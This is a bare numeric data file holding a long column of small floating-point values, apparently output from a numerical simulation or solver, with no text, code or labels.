-3.7624e-06
1.34032e-06
-2.40691e-06
-3.39551e-06
-5.73329e-06
-3.41955e-06
-6.12539e-06
-9.24146e-07
-4.26419e-06
-5.28627e-06
-2.20822e-06
-5.91748e-06
-2.53272e-06
1.66085e-07
-9.44176e-06
-9.62808e-06
-7.2731e-06
-6.93295e-06
-8.21861e-06
-8.48919e-06
-4.15604e-06
-3.76309e-06
1.3249e-06
-2.40696e-06
-3.39614e-06
-5.74228e-06
-6.13148e-06
-3.42292e-06
-4.25355e-06
-9.16622e-07
-5.27973e-06
-2.20921e-06
-2.53048e-06
-5.91827e-06
2.10729e-07
-9.46586e-06
-9.66657e-06
-7.26988e-06
-6.92979e-06
-8.23322e-06
-8.50809e-06
-4.16147e-06
-3.76942e-06
1.27245e-06
-2.41339e-06
-3.39906e-06
-5.71005e-06
-3.42249e-06
-6.13557e-06
-9.1792e-07
-4.26822e-06
-5.29479e-06
-2.21263e-06
-5.93064e-06
-2.53453e-06
1.09091e-07
-9.50832e-06
-9.67026e-06
-7.26364e-06
-6.94251e-06
-8.26238e-06
-8.51165e-06
-4.16201e-06
-6.64554e-06
-8.46799e-06
-6.6381e-06
-8.47715e-06
-3.76745e-06
1.31599e-06
-2.41012e-06
-3.39543e-06
-5.72393e-06
-6.12931e-06
-3.41902e-06
-4.25821e-06
-9.06349e-07
-5.28708e-06
-2.20815e-06
-2.53053e-06
-5.92121e-06
1.67195e-07
-9.47262e-06
-9.67481e-06
-7.25459e-06
-6.934e-06
-8.22899e-06
-8.51399e-06
-4.16086e-06
-3.75728e-06
1.32702e-06
-2.40314e-06
-3.39672e-06
-5.69313e-06
-3.42023e-06
-6.13887e-06
-4.2501e-06
-9.2787e-07
-5.2793e-06
-2.20857e-06
-2.53196e-06
-5.92411e-06
1.96554e-07
-9.46625e-06
-9.66343e-06
-7.26473e-06
-6.92852e-06
-8.23281e-06
-8.50662e-06
-4.15932e-06
-6.69526e-06
-8.48521e-06
-6.66856e-06
-8.4713e-06
-7.77251e-06
-8.45276e-06
-1.27456e-05
-1.87688e-05
-7.3166e-06
-6.5119e-06
-2.00665e-06
-1.32379e-05
-7.31628e-06
-1.87816e-05
-7.26658e-06
-7.64151e-06
-2.50221e-06
2.42406e-07
-5.88476e-06
-7.75805e-06
-8.32779e-06
-1.2724e-05
-1.87581e-05
-7.30274e-06
-6.57437e-06
-2.14211e-06
-1.32517e-05
-7.32234e-06
-1.88405e-05
-7.31835e-06
-7.47235e-06
-2.52116e-06
2.24752e-07
-5.87853e-06
-9.56168e-06
-1.38454e-05
-1.22458e-05
-7.37918e-06
-1.73211e-05
-1.17584e-05
-4.74384e-06
-3.59666e-06
-3.06151e-06
-7.24105e-06
-3.86858e-06
-7.60041e-06
-9.17757e-06
-1.74538e-06
-9.58545e-06
-1.39457e-05
-1.22475e-05
-7.38938e-06
-1.73398e-05
-1.18044e-05
-4.746e-06
-3.61279e-06
-3.06519e-06
-7.25761e-06
-3.87269e-06
-7.61163e-06
-9.19225e-06
-1.74938e-06
-7.74931e-06
-8.3435e-06
-1.27333e-05
-1.87286e-05
-7.30902e-06
-6.53592e-06
-2.13836e-06
-1.32453e-05
-7.31536e-06
-1.88259e-05
-7.21142e-06
-7.63964e-06
-2.4801e-06
2.87434e-07
-5.86455e-06
-7.80785e-06
-8.27825e-06
-1.27149e-05
-1.87526e-05
-7.30458e-06
-6.57078e-06
-1.98103e-06
-1.32331e-05
-7.31595e-06
-1.87789e-05
-7.27227e-06
-7.55456e-06
-2.48083e-06
3.11211e-07
-5.8718e-06
-9.59557e-06
-1.3984e-05
-1.22531e-05
-7.38745e-06
-1.73771e-05
-1.18084e-05
-4.74997e-06
-3.61751e-06
-3.06654e-06
-7.26945e-06
-3.87611e-06
-7.61555e-06
-9.20718e-06
-1.75112e-06
-9.55997e-06
-1.38226e-05
-1.22369e-05
-7.38165e-06
-1.72891e-05
-1.17645e-05
-4.74011e-06
-3.59106e-06
-3.05987e-06
-7.2314e-06
-3.85784e-06
-7.59655e-06
-9.15556e-06
-1.73953e-06
-7.88091e-06
-8.40646e-06
-1.27453e-05
-1.87826e-05
-7.32113e-06
-6.59526e-06
-2.05686e-06
-1.32436e-05
-7.32243e-06
-1.8815e-05
-7.32284e-06
-7.59214e-06
-2.4449e-06
3.65853e-07
-5.8831e-06
-7.74806e-06
-8.26922e-06
-1.27202e-05
-1.87387e-05
-7.3004e-06
-6.54179e-06
-2.02194e-06
-1.32402e-05
-7.31839e-06
-1.87934e-05
-7.31001e-06
-7.45476e-06
-2.50093e-06
2.41575e-07
-5.85636e-06
-9.56003e-06
-1.38861e-05
-1.22409e-05
-7.38368e-06
-1.73013e-05
-1.17755e-05
-4.74075e-06
-3.59217e-06
-3.05855e-06
-7.23941e-06
-3.86475e-06
-7.59494e-06
-9.16679e-06
-1.74213e-06
-9.56764e-06
-1.38862e-05
-1.22468e-05
-7.38115e-06
-1.73421e-05
-1.17794e-05
-4.74331e-06
-3.5942e-06
-3.05882e-06
-7.24561e-06
-3.86473e-06
-7.59701e-06
-9.17583e-06
-1.74259e-06
-7.74091e-06
-8.35841e-06
-1.27366e-05
-1.873e-05
-7.31228e-06
-6.51157e-06
-2.05223e-06
-1.32365e-05
-7.31478e-06
-1.87867e-05
-7.20025e-06
-7.58029e-06
-2.5171e-06
1.99552e-07
-5.84709e-06
-7.85814e-06
-8.33273e-06
-1.27276e-05
-1.87851e-05
-7.30924e-06
-6.66078e-06
-2.19213e-06
-1.32578e-05
-7.32713e-06
-1.88737e-05
-7.30752e-06
-7.48896e-06
-2.50314e-06
3.03592e-07
-5.88378e-06
-9.58531e-06
-1.39211e-05
-1.22522e-05
-7.38355e-06
-1.73736e-05
-1.1782e-05
-4.74927e-06
-3.61645e-06
-3.06622e-06
-7.27489e-06
-3.87704e-06
-7.61528e-06
-9.21131e-06
-1.75152e-06
-9.58706e-06
-1.39414e-05
-1.22512e-05
-7.39235e-06
-1.73498e-05
-1.18077e-05
-4.74864e-06
-3.60543e-06
-3.06036e-06
-7.24743e-06
-3.87019e-06
-7.60337e-06
-9.18674e-06
-1.74636e-06
-2.58523e-06
5.57854e-06
-2.66982e-06
2.35284e-06
-1.05048e-06
3.50135e-07
2.54582e-06
-2.58457e-06
5.586e-06
-2.66484e-06
2.36209e-06
-1.04563e-06
3.07929e-07
2.53092e-06
-2.58284e-06
5.58156e-06
-2.66436e-06
2.34782e-06
-1.04487e-06
3.47348e-07
2.54886e-06
-2.5973e-06
5.58141e-06
-2.669e-06
2.34666e-06
-1.05478e-06
3.00066e-07
2.52919e-06
-2.58104e-06
5.58252e-06
-2.67285e-06
2.35136e-06
-1.04901e-06
2.97742e-07
2.52854e-06
-2.58504e-06
5.5706e-06
-2.66704e-06
2.33907e-06
-1.04737e-06
2.95823e-07
2.52439e-06
-2.58271e-06
5.57256e-06
-2.67535e-06
2.34713e-06
-1.05142e-06
2.9861e-07
2.52909e-06
-2.58151e-06
5.57858e-06
-2.66731e-06
2.35046e-06
-1.04544e-06
2.99417e-07
2.52806e-06
-1.46507e-05
-6.97561e-06
-4.1334e-06
-1.00545e-05
-1.57782e-05
-1.24899e-05
-7.63214e-06
-5.2403e-06
-1.31292e-05
-4.11107e-06
-1.09494e-05
-1.46342e-05
-6.97807e-06
-4.12534e-06
-1.00474e-05
-1.58051e-05
-1.2479e-05
-7.62936e-06
-5.24171e-06
-1.31332e-05
-4.19179e-06
-1.09495e-05
-6.80572e-06
-1.81804e-05
-2.88074e-06
-9.38877e-06
-5.19665e-06
-1.76535e-05
-3.57546e-06
-6.77447e-06
-1.8066e-05
-2.86271e-06
-9.36826e-06
-5.1627e-06
-1.75681e-05
-3.56197e-06
-1.46335e-05
-6.97905e-06
-4.15135e-06
-1.00536e-05
-1.579e-05
-1.24583e-05
-7.62413e-06
-5.24075e-06
-1.31174e-05
-4.1549e-06
-1.09504e-05
-1.46325e-05
-6.97248e-06
-4.11768e-06
-1.00476e-05
-1.57983e-05
-1.24964e-05
-7.63258e-06
-5.24704e-06
-1.31342e-05
-4.2038e-06
-1.09511e-05
-6.80103e-06
-1.81239e-05
-2.87449e-06
-9.38279e-06
-5.19178e-06
-1.76246e-05
-3.5725e-06
-6.8034e-06
-1.81329e-05
-2.87422e-06
-9.36408e-06
-5.187e-06
-1.76136e-05
-3.54056e-06
-6.79341e-06
-1.81363e-05
-2.87563e-06
-9.38349e-06
-5.18267e-06
-1.7629e-05
-3.57074e-06
-6.79227e-06
-1.81063e-05
-2.87194e-06
-9.38073e-06
-5.17931e-06
-1.76181e-05
-3.56944e-06
-1.4648e-05
-6.97525e-06
-4.139e-06
-1.00521e-05
-1.58249e-05
-1.25138e-05
-7.63473e-06
-5.25263e-06
-1.31424e-05
-4.263e-06
-1.09568e-05
-1.46555e-05
-6.98285e-06
-4.16763e-06
-1.0059e-05
-1.58141e-05
-1.25553e-05
-7.63575e-06
-5.24479e-06
-1.3141e-05
-4.2198e-06
-1.09572e-05
-6.77512e-06
-1.80801e-05
-2.89719e-06
-9.39729e-06
-5.14334e-06
-1.75978e-05
-3.57537e-06
-6.78414e-06
-1.81205e-05
-2.87076e-06
-9.37711e-06
-5.17752e-06
-1.76111e-05
-3.56503e-06
-1.46619e-05
-6.98138e-06
-4.20556e-06
-1.00481e-05
-1.57848e-05
-1.24387e-05
-7.6315e-06
-5.23916e-06
-1.31281e-05
-4.1027e-06
-1.09504e-05
-1.45837e-05
-6.96837e-06
-4.02347e-06
-1.00356e-05
-1.57584e-05
-1.24578e-05
-7.62524e-06
-5.23861e-06
-1.31135e-05
-4.11917e-06
-1.09388e-05
-9.19715e-06
-8.65809e-06
-1.57788e-05
-1.39629e-05
-1.95973e-05
-4.0881e-06
-8.88745e-06
-1.45939e-05
-6.66499e-06
-9.19379e-06
-8.60624e-06
-1.58229e-05
-1.39559e-05
-1.9587e-05
-4.04401e-06
-8.88063e-06
-1.46499e-05
-6.65601e-06
-1.15617e-05
-6.85857e-06
-5.8869e-06
-7.79966e-06
-7.57161e-06
-8.19351e-06
-1.03122e-05
-1.26248e-05
-7.66758e-06
-8.65666e-06
-6.31317e-06
-8.00828e-06
-1.19795e-05
-8.7316e-06
-1.36487e-05
-7.06992e-06
-8.07043e-06
-1.04498e-05
-1.72651e-05
-8.23258e-06
-9.80289e-06
-5.21975e-06
-2.16984e-06
-1.53793e-05
-1.29264e-05
-2.64875e-06
-1.67062e-05
-1.31425e-05
-6.23153e-06
-1.83768e-05
-1.01504e-05
-5.90608e-06
-3.49286e-06
-1.06899e-05
-1.51248e-05
-3.48518e-06
-6.42698e-06
-2.32474e-06
-6.87063e-06
-1.09557e-05
-7.74149e-06
-1.09207e-05
-9.22614e-06
-3.86385e-06
-1.82922e-06
-7.60784e-06
-1.00984e-05
-1.37456e-05
-9.18739e-06
-1.94204e-05
-1.70648e-05
-5.9036e-06
-5.97523e-06
-1.6328e-05
-1.2612e-05
-1.26387e-05
-1.64686e-05
-1.30871e-05
-4.22981e-06
-8.06303e-06
-1.59707e-05
-1.32492e-05
-8.68948e-06
-1.15567e-05
-6.77933e-06
-7.79062e-06
-5.89289e-06
-7.54998e-06
-1.03079e-05
-8.19474e-06
-1.26125e-05
-7.62144e-06
-8.64622e-06
-6.31264e-06
-7.9658e-06
-1.1961e-05
-8.73595e-06
-1.36476e-05
-7.06796e-06
-8.07379e-06
-1.0393e-05
-1.72537e-05
-8.21712e-06
-9.79888e-06
-5.21677e-06
-2.16049e-06
-1.53695e-05
-1.2923e-05
-2.49748e-06
-1.66645e-05
-6.21378e-06
-1.31029e-05
-1.82479e-05
-1.00955e-05
-5.88561e-06
-3.18382e-06
-1.0656e-05
-1.49043e-05
-3.48725e-06
-6.44268e-06
-2.3172e-06
-6.8907e-06
-1.09481e-05
-7.74608e-06
-1.09053e-05
-9.24521e-06
-3.89628e-06
-1.84302e-06
-7.64819e-06
-1.01152e-05
-1.37371e-05
-9.22802e-06
-1.94439e-05
-1.70436e-05
-5.93928e-06
-5.96242e-06
-1.62864e-05
-1.25934e-05
-1.26598e-05
-1.64902e-05
-1.30778e-05
-4.23711e-06
-8.05448e-06
-1.59397e-05
-1.32279e-05
-8.67846e-06
-9.20103e-06
-8.69514e-06
-1.58308e-05
-1.39597e-05
-1.96114e-05
-4.06765e-06
-8.87685e-06
-1.46535e-05
-6.65677e-06
-9.19095e-06
-8.57872e-06
-1.57642e-05
-1.39527e-05
-1.95413e-05
-3.99339e-06
-8.87864e-06
-1.45826e-05
-6.65645e-06
-1.1569e-05
-6.80366e-06
-5.89753e-06
-7.79396e-06
-7.57484e-06
-8.19886e-06
-1.03167e-05
-1.26219e-05
-7.67094e-06
-8.65425e-06
-6.31639e-06
-7.99522e-06
-1.19805e-05
-8.73948e-06
-1.36695e-05
-7.06281e-06
-8.07816e-06
-1.04352e-05
-1.7314e-05
-8.32045e-06
-9.81157e-06
-5.22654e-06
-2.29288e-06
-1.54123e-05
-1.29398e-05
-2.65405e-06
-1.67019e-05
-1.31295e-05
-6.23068e-06
-1.83554e-05
-1.01502e-05
-5.90468e-06
-3.3075e-06
-1.0676e-05
-1.50631e-05
-3.49261e-06
-6.44292e-06
-2.3481e-06
-6.88307e-06
-1.09633e-05
-7.75698e-06
-1.09335e-05
-9.25535e-06
-3.95627e-06
-1.89482e-06
-7.61919e-06
-1.0117e-05
-1.37587e-05
-9.21157e-06
-1.93938e-05
-1.70657e-05
-5.89872e-06
-5.97384e-06
-1.63203e-05
-1.26029e-05
-1.2634e-05
-1.6453e-05
-1.30863e-05
-4.2276e-06
-8.05692e-06
-1.5955e-05
-1.32506e-05
-8.6859e-06
-1.15599e-05
-6.86113e-06
-7.80163e-06
-5.88291e-06
-7.54725e-06
-1.03175e-05
-8.19312e-06
-1.262e-05
-7.66432e-06
-8.65688e-06
-6.30748e-06
-7.98986e-06
-1.19776e-05
-8.73038e-06
-1.36623e-05
-7.05979e-06
-8.07643e-06
-1.0416e-05
-1.72671e-05
-8.22108e-06
-9.80423e-06
-5.21824e-06
-2.17316e-06
-1.53774e-05
-1.29298e-05
-2.40518e-06
-1.66145e-05
-6.19842e-06
-1.31568e-05
-1.83165e-05
-1.01191e-05
-5.93631e-06
-3.34995e-06
-1.07086e-05
-1.49487e-05
-3.51352e-06
-6.45194e-06
-2.32731e-06
-6.89542e-06
-1.09639e-05
-7.76707e-06
-1.09163e-05
-9.25242e-06
-3.814e-06
-1.81811e-06
-7.65554e-06
-1.01179e-05
-1.37572e-05
-9.17009e-06
-1.94534e-05
-1.7037e-05
-5.94932e-06
-5.94812e-06
-1.63022e-05
-1.25534e-05
-1.26803e-05
-1.64846e-05
-1.30828e-05
-4.24044e-06
-8.05534e-06
-1.59373e-05
-1.32295e-05
-8.67894e-06
-1.15717e-05
-6.90289e-06
-5.89351e-06
-7.80714e-06
-7.58588e-06
-8.19763e-06
-1.03349e-05
-1.26273e-05
-7.64703e-06
-8.65672e-06
-6.31555e-06
-7.97954e-06
-1.1981e-05
-8.73716e-06
-1.36121e-05
-7.07148e-06
-8.06395e-06
-1.04225e-05
-1.72828e-05
-8.27905e-06
-9.80303e-06
-5.21898e-06
-2.24699e-06
-1.53899e-05
-1.29269e-05
-2.57019e-06
-1.67165e-05
-1.31694e-05
-6.23365e-06
-1.84202e-05
-1.02527e-05
-5.9517e-06
-3.34933e-06
-1.06741e-05
-1.50419e-05
-3.48635e-06
-6.45454e-06
-2.32672e-06
-6.94359e-06
-1.09644e-05
-7.7803e-06
-1.09265e-05
-9.26109e-06
-3.91334e-06
-1.86383e-06
-7.72606e-06
-1.01387e-05
-1.37626e-05
-9.28191e-06
-1.94874e-05
-1.70788e-05
-5.95041e-06
-5.968e-06
-1.63127e-05
-1.2664e-05
-1.26609e-05
-1.65273e-05
-1.30975e-05
-4.24819e-06
-8.06818e-06
-1.59802e-05
-1.32542e-05
-8.68576e-06
-1.15781e-05
-6.85096e-06
-7.79608e-06
-5.89238e-06
-7.60503e-06
-1.03281e-05
-8.19892e-06
-1.2635e-05
-7.70074e-06
-8.66344e-06
-6.31705e-06
-8.01345e-06
-1.19985e-05
-8.73875e-06
-1.36609e-05
-7.07348e-06
-8.07264e-06
-1.04667e-05
-1.73279e-05
-8.32555e-06
-9.81439e-06
-5.2269e-06
-2.30433e-06
-1.54219e-05
-1.2941e-05
-2.69545e-06
-1.67315e-05
-6.2412e-06
-1.31747e-05
-1.84625e-05
-1.02687e-05
-5.96029e-06
-3.27233e-06
-1.06704e-05
-1.50326e-05
-3.50595e-06
-6.4635e-06
-2.3477e-06
-6.95271e-06
-1.09738e-05
-7.79032e-06
-1.09336e-05
-9.27811e-06
-3.97491e-06
-1.89118e-06
-7.73441e-06
-1.01596e-05
-1.37728e-05
-9.30923e-06
-1.95048e-05
-1.70933e-05
-5.95202e-06
-5.97407e-06
-1.6321e-05
-1.26574e-05
-1.26665e-05
-1.65347e-05
-1.3101e-05
-4.24869e-06
-8.06933e-06
-1.59866e-05
-1.32568e-05
-8.68859e-06
-9.18877e-06
-8.56528e-06
-1.57922e-05
-1.39481e-05
-1.95517e-05
-3.99608e-06
-8.87298e-06
-1.4603e-05
-6.65336e-06
-9.20218e-06
-8.70721e-06
-1.58147e-05
-1.396e-05
-1.95955e-05
-4.0305e-06
-8.8836e-06
-1.46321e-05
-6.6596e-06
-1.15668e-05
-6.90851e-06
-5.89573e-06
-7.77871e-06
-7.59416e-06
-8.19418e-06
-1.03261e-05
-1.26241e-05
-7.6304e-06
-8.65775e-06
-6.32037e-06
-7.97673e-06
-1.19746e-05
-8.73468e-06
-1.36211e-05
-7.06487e-06
-8.07713e-06
-1.03854e-05
-1.72853e-05
-8.27097e-06
-9.80523e-06
-5.21965e-06
-2.22612e-06
-1.53904e-05
-1.2932e-05
-2.75367e-06
-1.67402e-05
-1.31847e-05
-6.24666e-06
-1.84817e-05
-1.02803e-05
-5.96119e-06
-3.37553e-06
-1.0681e-05
-1.50439e-05
-3.51443e-06
-6.45365e-06
-2.33858e-06
-6.93615e-06
-1.0971e-05
-7.78245e-06
-1.09309e-05
-9.25082e-06
-3.89055e-06
-1.81796e-06
-7.70533e-06
-1.01437e-05
-1.37728e-05
-9.27854e-06
-1.95147e-05
-1.70919e-05
-5.96236e-06
-5.98019e-06
-1.63339e-05
-1.26531e-05
-1.26951e-05
-1.65288e-05
-1.3094e-05
-4.25011e-06
-8.06536e-06
-1.59638e-05
-1.32546e-05
-8.69211e-06
-1.15649e-05
-6.82908e-06
-7.76789e-06
-5.89384e-06
-7.57577e-06
-1.03182e-05
-8.19405e-06
-1.26297e-05
-7.67755e-06
-8.65574e-06
-6.32144e-06
-8.0047e-06
-1.19868e-05
-8.74128e-06
-1.36314e-05
-7.0712e-06
-8.07403e-06
-1.04174e-05
-1.72847e-05
-8.29947e-06
-9.80491e-06
-5.2202e-06
-2.25232e-06
-1.53951e-05
-1.29308e-05
-2.52736e-06
-1.67061e-05
-6.23012e-06
-1.31666e-05
-1.8396e-05
-1.02196e-05
-5.94447e-06
-3.32352e-06
-1.06698e-05
-1.50137e-05
-3.49531e-06
-6.45171e-06
-2.32407e-06
-6.93974e-06
-1.09667e-05
-7.77896e-06
-1.09288e-05
-9.25147e-06
-3.91116e-06
-1.82425e-06
-7.71186e-06
-1.01444e-05
-1.37746e-05
-9.28289e-06
-1.9494e-05
-1.70797e-05
-5.95766e-06
-5.96809e-06
-1.6327e-05
-1.26507e-05
-1.26863e-05
-1.65304e-05
-1.30942e-05
-4.24873e-06
-8.06632e-06
-1.59745e-05
-1.32524e-05
-8.69111e-06
-9.20604e-06
-8.75865e-06
-1.58487e-05
-1.39693e-05
-1.96514e-05
-4.13891e-06
-8.88617e-06
-1.46838e-05
-6.66437e-06
-9.19772e-06
-8.64182e-06
-1.57932e-05
-1.39574e-05
-1.95888e-05
-4.05193e-06
-8.88099e-06
-1.45591e-05
-6.65969e-06
0.00073468
0.000734678
0.000725907
0.000725904
0.000725902
0.000725899
0.000734674
0.00069956
0.000699559
0.000690787
0.00069078
0.000690779
0.000690774
0.000699555
0.000697571
0.000701371
0.000701369
0.000697969
0.000701528
0.000697729
0.000697726
0.000664439
0.000664439
0.000655668
0.000655663
0.000655663
0.000655656
0.000664435
0.000662455
0.000666253
0.000666255
0.000662849
0.000666412
0.00066261
0.00066261
0.00062932
0.000629322
0.000620548
0.000620542
0.000620544
0.000620536
0.000629315
0.000627336
0.000631131
0.000631133
0.000627733
0.000631291
0.000627491
0.000627491
0.000594199
0.0005942
0.000585427
0.00058542
0.000585421
0.000585413
0.000594194
0.000592222
0.000596018
0.000596019
0.000592609
0.000596179
0.000592375
0.000592376
0.000559074
0.000559076
0.000550302
0.000550295
0.000550295
0.000550288
0.000559069
0.000557096
0.000560894
0.000560893
0.00055749
0.00056105
0.000557253
0.000557252
0.000523945
0.000523943
0.000515168
0.000515162
0.000515161
0.000515154
0.000523938
0.00052196
0.000525762
0.000525761
0.000522356
0.000525919
0.000522118
0.000522115
0.000488805
0.000488805
0.000480028
0.000480021
0.000480021
0.000480015
0.0004888
0.000486826
0.000490625
0.000490624
0.000487225
0.000490782
0.000486985
0.000486985
0.000453663
0.000453665
0.000444886
0.000444878
0.000444881
0.000444874
0.00045366
0.000451682
0.000455477
0.00045548
0.000452077
0.000455638
0.000451836
0.000451837
0.000418524
0.000418525
0.000409748
0.000409741
0.00040974
0.000409734
0.000418519
0.000416544
0.000420339
0.000420342
0.000416933
0.000420502
0.000416694
0.000416697
0.000383384
0.000383385
0.000374606
0.000374601
0.000374601
0.000374596
0.00038338
0.000381406
0.0003852
0.0003852
0.000381795
0.000385359
0.000381559
0.000381557
0.000348247
0.000348248
0.00033947
0.000339464
0.000339465
0.000339459
0.000348243
0.000346268
0.000350062
0.000350062
0.000346659
0.000350222
0.00034642
0.000346419
0.000313112
0.000313113
0.000304336
0.000304331
0.000304331
0.000304326
0.000313109
0.000311134
0.000314927
0.000314926
0.000311529
0.000315085
0.00031129
0.000311289
0.000277982
0.000277982
0.000269205
0.0002692
0.000269201
0.000269196
0.000277978
0.000276006
0.000279794
0.000279795
0.000276397
0.000279954
0.000276159
0.000276159
0.000242856
0.000242855
0.000234081
0.000234077
0.000234075
0.00023407
0.000242852
0.000240875
0.000244665
0.000244665
0.00024127
0.000244822
0.000241029
0.000241029
0.000207728
0.000207727
0.000198948
0.000198946
0.000198946
0.00019894
0.000207723
0.000205748
0.000209534
0.000209532
0.000206143
0.000209691
0.000205904
0.000205902
0.000172588
0.000172589
0.000163808
0.000163806
0.000163808
0.000163802
0.000172586
0.000170617
0.000174395
0.000174393
0.000171009
0.000174552
0.000170772
0.000170769
0.000137443
0.000137444
0.000128659
0.000128662
0.000128662
0.000128653
0.00013744
0.000135479
0.000139244
0.000139245
0.000135866
0.000139406
0.000135631
0.000135632
0.000102279
0.00010228
9.3496e-05
9.34991e-05
9.34999e-05
9.34846e-05
0.000102277
0.000100318
0.000104058
0.000104058
0.000100701
0.000104227
0.000100471
0.000100471
6.7126e-05
6.71234e-05
5.83646e-05
5.8405e-05
5.84037e-05
5.84252e-05
6.71412e-05
6.51573e-05
6.88339e-05
6.88348e-05
6.55263e-05
6.90199e-05
6.53057e-05
6.53037e-05
3.29746e-05
3.29739e-05
2.47483e-05
2.532e-05
2.53188e-05
2.58489e-05
3.33486e-05
2.98875e-05
3.35416e-05
3.35416e-05
3.04882e-05
3.36695e-05
3.01894e-05
3.0187e-05
5.46278e-06
5.2987e-06
5.29415e-06
4.28977e-06
3.13328e-06
5.49e-06
5.49443e-06
0.000732688
0.000736486
0.000736485
0.000733089
0.000736642
0.000732849
0.000732845
0.000710306
0.000709903
0.000706507
0.000706506
0.000710151
0.000710153
0.000706348
0.000732695
0.000736486
0.000736487
0.000733087
0.000732847
0.000736646
0.000732851
0.000710307
0.000709908
0.000706513
0.000706511
0.000710156
0.000710156
0.000706351
0.000732688
0.000736484
0.000736483
0.000733089
0.000732846
0.000736642
0.000732848
0.000710305
0.000709901
0.000706505
0.000706507
0.000710149
0.000710152
0.000706348
0.000710311
0.000709902
0.000706512
0.000706511
0.000706353
0.000710155
0.000710155
0.000697573
0.000701368
0.000701367
0.00069797
0.000701526
0.00069773
0.000697728
0.000675193
0.000674779
0.000671389
0.000671388
0.000675033
0.000675034
0.000671232
0.000697575
0.00070137
0.000701371
0.000697972
0.000697731
0.000701529
0.000697732
0.000675194
0.000674783
0.000671393
0.000671393
0.000675037
0.000675037
0.000671235
0.00069757
0.000701365
0.000701367
0.000697966
0.000697723
0.000701525
0.000697728
0.000675193
0.000674779
0.000671391
0.000671389
0.000675034
0.000675036
0.000671232
0.000675195
0.000674782
0.000671393
0.000671394
0.000671237
0.000675037
0.000675038
0.000662457
0.000666248
0.00066625
0.000662851
0.000666409
0.000662612
0.000662612
0.000640076
0.000639663
0.000636273
0.000636272
0.000639917
0.000639918
0.000636115
0.000662457
0.000666249
0.000666252
0.000662853
0.000662612
0.000666411
0.000662614
0.000640076
0.000639664
0.000636275
0.000636274
0.000639917
0.000639919
0.000636116
0.000662455
0.000666249
0.000666249
0.000662849
0.00066261
0.000666407
0.000662611
0.000640074
0.000639661
0.000636271
0.00063627
0.000639915
0.000639916
0.000636117
0.000640075
0.000639664
0.000636274
0.000636275
0.000636117
0.000639918
0.000639918
0.000627338
0.000631134
0.000631134
0.000627733
0.00063129
0.000627494
0.000627494
0.000604957
0.000604543
0.000601156
0.000601156
0.000604799
0.0006048
0.000600998
0.000627339
0.000631133
0.000631135
0.000627734
0.000627495
0.000631292
0.000627493
0.000604959
0.000604541
0.000601156
0.000601153
0.000604797
0.000604798
0.000600999
0.00062734
0.000631131
0.000631132
0.00062773
0.000627494
0.000631294
0.000627493
0.000604959
0.000604548
0.000601157
0.000601158
0.000604802
0.000604804
0.000601
0.000604961
0.000604542
0.000601156
0.000601159
0.000601004
0.000604799
0.000604803
0.000592219
0.000596012
0.000596013
0.000592609
0.000596174
0.000592373
0.00059237
0.000569836
0.000569426
0.000566038
0.00056604
0.000569678
0.000569682
0.000565879
0.000592219
0.000596016
0.000596013
0.000592612
0.000592372
0.000596172
0.000592374
0.00056984
0.000569416
0.000566031
0.000566032
0.000569676
0.000569678
0.00056588
0.000592224
0.000596013
0.000596016
0.000592611
0.000592374
0.000596175
0.000592376
0.000569838
0.00056942
0.000566035
0.000566033
0.000569677
0.000569677
0.000565881
0.000569832
0.000569423
0.000566036
0.000566033
0.000565875
0.000569677
0.000569675
0.000557101
0.000560894
0.000560897
0.00055749
0.000561054
0.000557256
0.000557257
0.000534707
0.000534295
0.000530905
0.000530905
0.000534548
0.000534548
0.000530749
0.000557099
0.000560889
0.000560891
0.000557484
0.000557249
0.000561055
0.00055725
0.000534703
0.000534296
0.000530903
0.000530904
0.000534546
0.00053455
0.000530742
0.000557101
0.000560893
0.000560893
0.000557487
0.000557252
0.000561057
0.000557254
0.000534707
0.000534298
0.00053091
0.00053091
0.000534552
0.000534552
0.000530751
0.000534703
0.000534293
0.000530904
0.000530904
0.000530746
0.000534545
0.000534546
0.000521969
0.000525761
0.000525763
0.000522359
0.000525923
0.00052212
0.000522122
0.000499575
0.000499156
0.000495767
0.000495764
0.000499416
0.000499414
0.000495609
0.000521963
0.000525759
0.000525761
0.00052236
0.000522121
0.000525915
0.00052212
0.000499566
0.000499157
0.000495763
0.000495764
0.00049941
0.000499411
0.000495604
0.000521969
0.000525762
0.000525764
0.000522353
0.000522118
0.000525925
0.000522122
0.000499571
0.000499162
0.00049577
0.00049577
0.000499415
0.000499416
0.000495609
0.000499567
0.00049916
0.000495767
0.000495766
0.000495609
0.000499411
0.000499413
0.000486827
0.00049062
0.000490619
0.00048722
0.000490779
0.000486982
0.00048698
0.000464426
0.000464016
0.000460619
0.000460622
0.000464265
0.000464271
0.000460463
0.000486822
0.000490617
0.000490618
0.000487218
0.000486975
0.000490776
0.000486978
0.000464428
0.000464017
0.000460625
0.000460625
0.00046427
0.000464271
0.000460468
0.000486826
0.000490623
0.000490625
0.000487221
0.000486982
0.00049078
0.000486982
0.000464429
0.00046402
0.000460629
0.000460629
0.000464273
0.000464275
0.000460468
0.00046443
0.00046402
0.000460626
0.000460627
0.000460469
0.000464273
0.000464274
0.000451683
0.000455475
0.000455477
0.000452078
0.000455636
0.000451839
0.000451838
0.000429289
0.000428879
0.00042549
0.000425491
0.000429134
0.000429134
0.000425329
0.000451693
0.000455481
0.000455481
0.000452079
0.000451845
0.000455643
0.000451846
0.000429287
0.000428874
0.000425484
0.000425484
0.000429129
0.000429129
0.000425326
0.000451691
0.000455481
0.000455483
0.000452079
0.000451843
0.00045564
0.000451845
0.000429288
0.000428879
0.000425487
0.000425485
0.000429131
0.000429133
0.000425326
0.000429292
0.000428879
0.000425489
0.00042549
0.000425333
0.000429134
0.000429136
0.000416545
0.000420341
0.000420342
0.000416937
0.000420501
0.000416701
0.0004167
0.000394148
0.000393734
0.000390345
0.000390341
0.000393987
0.000393987
0.000390188
0.000416543
0.000420339
0.00042034
0.000416938
0.000416698
0.000420497
0.000416702
0.000394147
0.000393735
0.000390343
0.000390343
0.000393986
0.00039399
0.000390186
0.000416545
0.000420339
0.000420342
0.00041694
0.000416701
0.000420499
0.000416701
0.000394151
0.000393739
0.000390348
0.000390347
0.000393992
0.000393995
0.000390188
0.000394149
0.000393739
0.000390345
0.000390346
0.000390188
0.000393993
0.000393993
0.000381404
0.000385199
0.000385197
0.000381797
0.00038536
0.000381559
0.000381559
0.000359011
0.000358594
0.000355204
0.000355205
0.000358849
0.000358852
0.000355047
0.000381407
0.000385197
0.000385198
0.000381801
0.000381564
0.000385357
0.000381564
0.000359008
0.000358596
0.000355204
0.000355205
0.000358848
0.000358849
0.000355047
0.000381406
0.000385197
0.000385199
0.000381798
